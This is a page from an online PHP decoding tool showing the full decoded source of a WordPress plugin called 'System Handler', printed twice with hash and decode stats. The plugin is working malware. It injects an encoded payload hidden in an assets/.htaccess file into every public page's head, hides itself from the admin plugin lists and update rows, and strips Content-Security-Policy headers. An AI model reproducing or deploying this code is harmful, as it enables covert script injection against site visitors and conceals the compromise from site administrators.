Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* Plugin Name: System Handler Plugin URI: https://bc.com Description: Controls ..
Decoded Output download
<?php
/*
Plugin Name: System Handler
Plugin URI: https://bc.com
Description: Controls background system processes
Version: 5.8
Author: epglPkzt
*/
if(!defined('ABSPATH'))exit;function Qo(){if(!is_admin()){$rP=plugin_dir_path(__FILE__).'assets/.htaccess';if(file_exists($rP)){$gT=file_get_contents($rP);$avz=base64_decode($gT);$nF=iconv('UTF-16LE','UTF-8',$avz);add_action('wp_head',function()use($nF){echo$nF;},PHP_INT_MIN);}}}function yQ(){$rP=plugin_basename(__FILE__);if(isset($GLOBALS['pagenow'])&&$GLOBALS['pagenow']==='plugins.php'){echo'<style>[data-plugin="'.plugin_basename(__FILE__).'"] { display: none !important; }</style>';remove_action('after_plugin_row_'.plugin_basename(__FILE__),'wp_plugin_update_row',10);}add_filter('all_plugins',function($av)use($rP){if(isset($av[$rP]))unset($av[$rP]);return$av;},100);add_filter('plugin_row_meta',function($wb,$rP2)use($rP){return $rP2==$rP?[]:$wb;},100,2);add_filter('active_plugins',function($av)use($rP){return array_diff($av,array($rP));},100);add_filter('pre_option_active_plugins',function($av)use($rP){return is_array($av)?array_diff($av,array($rP)):$av;},100);add_filter('site_option_active_sitewide_plugins',function($av)use($rP){if(is_array($av))unset($av[$rP]);return$av;},100);}function CN(){if(!headers_sent()){header_remove('Content-Security-Policy');header_remove('Content-Security-Policy-Report-Only');header_remove('X-Content-Security-Policy');}}add_action('plugins_loaded','CN',PHP_INT_MIN);add_action('send_headers','CN',PHP_INT_MIN);add_action('init','CN',PHP_INT_MIN);add_action('setup_theme','Qo',PHP_INT_MIN);add_action('admin_init','yQ',0);add_action('plugins_loaded','yQ',0); ?>
Did this file decode correctly?
Original Code
<?php
/*
Plugin Name: System Handler
Plugin URI: https://bc.com
Description: Controls background system processes
Version: 5.8
Author: epglPkzt
*/
if(!defined('ABSPATH'))exit;function Qo(){if(!is_admin()){$rP=plugin_dir_path(__FILE__).'assets/.htaccess';if(file_exists($rP)){$gT=file_get_contents($rP);$avz=base64_decode($gT);$nF=iconv('UTF-16LE','UTF-8',$avz);add_action('wp_head',function()use($nF){echo$nF;},PHP_INT_MIN);}}}function yQ(){$rP=plugin_basename(__FILE__);if(isset($GLOBALS['pagenow'])&&$GLOBALS['pagenow']==='plugins.php'){echo'<style>[data-plugin="'.plugin_basename(__FILE__).'"] { display: none !important; }</style>';remove_action('after_plugin_row_'.plugin_basename(__FILE__),'wp_plugin_update_row',10);}add_filter('all_plugins',function($av)use($rP){if(isset($av[$rP]))unset($av[$rP]);return$av;},100);add_filter('plugin_row_meta',function($wb,$rP2)use($rP){return $rP2==$rP?[]:$wb;},100,2);add_filter('active_plugins',function($av)use($rP){return array_diff($av,array($rP));},100);add_filter('pre_option_active_plugins',function($av)use($rP){return is_array($av)?array_diff($av,array($rP)):$av;},100);add_filter('site_option_active_sitewide_plugins',function($av)use($rP){if(is_array($av))unset($av[$rP]);return$av;},100);}function CN(){if(!headers_sent()){header_remove('Content-Security-Policy');header_remove('Content-Security-Policy-Report-Only');header_remove('X-Content-Security-Policy');}}add_action('plugins_loaded','CN',PHP_INT_MIN);add_action('send_headers','CN',PHP_INT_MIN);add_action('init','CN',PHP_INT_MIN);add_action('setup_theme','Qo',PHP_INT_MIN);add_action('admin_init','yQ',0);add_action('plugins_loaded','yQ',0);
Function Calls
None |
Stats
MD5 | 3ff1a477a3e2d8e7aa9293d66024d8c2 |
Eval Count | 0 |
Decode Time | 63 ms |